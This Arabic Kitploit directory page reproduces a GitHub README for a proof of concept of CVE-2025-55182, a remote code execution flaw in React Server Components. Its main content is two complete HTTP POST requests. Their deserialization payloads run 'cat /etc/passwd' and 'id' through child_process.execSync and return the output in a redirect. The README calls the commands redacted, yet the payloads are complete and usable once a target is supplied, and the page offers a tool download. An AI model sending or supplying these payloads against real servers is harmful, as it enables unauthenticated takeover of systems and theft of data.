Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell_Rce-cve-2025-55182 — إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0، بما في ذلك react-server-dom-parcel وreact-server-dom-turbopack وreact-server-dom-webpack، تحتوي على ثغرة تنفيذ كود عن بُعد. | Kitploit
أدوات/GitHubGitHub/muhammadwaseem29/react2shell_rce-cve-2025-55182
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubmuhammadwaseem29/react2shell_rce-cve-2025-55182

React2Shell_Rce-cve-2025-55182

إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0، بما في ذلك react-server-dom-parcel وreact-server-dom-turbopack وreact-server-dom-webpack، تحتوي على ثغرة تنفيذ كود عن بُعد.

عرض المستودعالموقع الإلكتروني
323منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React Server Components RCE – README

يوم سعيد، أتمنى حقًا أن يكون كل شيء رائعًا على جانب شاشتك! 😊✨

الوصف

إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0، بما في ذلك react-server-dom-parcel وreact-server-dom-turbopack وreact-server-dom-webpack، تحتوي على ثغرة تنفيذ تعليمات برمجية عن بُعد.

تنجم المشكلة عن إلغاء تسلسل غير آمن للحمولات التي يتحكم فيها المهاجم والمُرسَلة إلى نقاط نهاية Server Function.


إثبات المفهوم (PoC) – الطلب الكامل (منقّح)

فيما يلي طلب HTTP الكامل الذي يوضّح الثغرة، مع استبدال الأوامر الحساسة بعناصر نائبة. استبدل redacted.com باسم المضيف المستهدف لديك.

root@kitploit:~
POST / HTTP/1.1
Host: redacted.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
لقطة شاشة 2025-12-06 at 11 49 57 PM

أمر id

root@kitploit:~
POST / HTTP/1.1
Host: redecated.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
لقطة شاشة 2025-12-06 at 11 55 21 PM

ملخص إثبات المفهوم (PoC):

  • يقوم الخادم بإلغاء تسلسل الحمولات المنظّمة من طلب multipart.
  • يسمح إلغاء التسلسل غير الآمن للمهاجم بالتأثير في تدفق التنفيذ.
  • تم استبدال الأوامر الحساسة بعناصر نائبة حفاظًا على السلامة.

التأثير

يمكن للمهاجمين غير المصادَق عليهم تنفيذ تعليمات برمجية عشوائية عن بُعد، مما قد يؤدي إلى اختراق كامل للنظام.


المعالجة

قم بالتحديث إلى أحدث إصدار من React Server Components الذي تم فيه تصحيح مسارات إلغاء التسلسل غير الآمنة.


المراجع

  • https://github.com/assetnote/react2shell-scanner
  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://www.facebook.com/security/advisories/cve-2025-55182
  • http://www.openwall.com/lists/oss-security/2025/12/03/4
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
  • https://vercel.com/changelog/cve-2025-55182

أتمنى أن تكون بخير على جانب شاشتك :) ✨❤️


تنزيل الأداة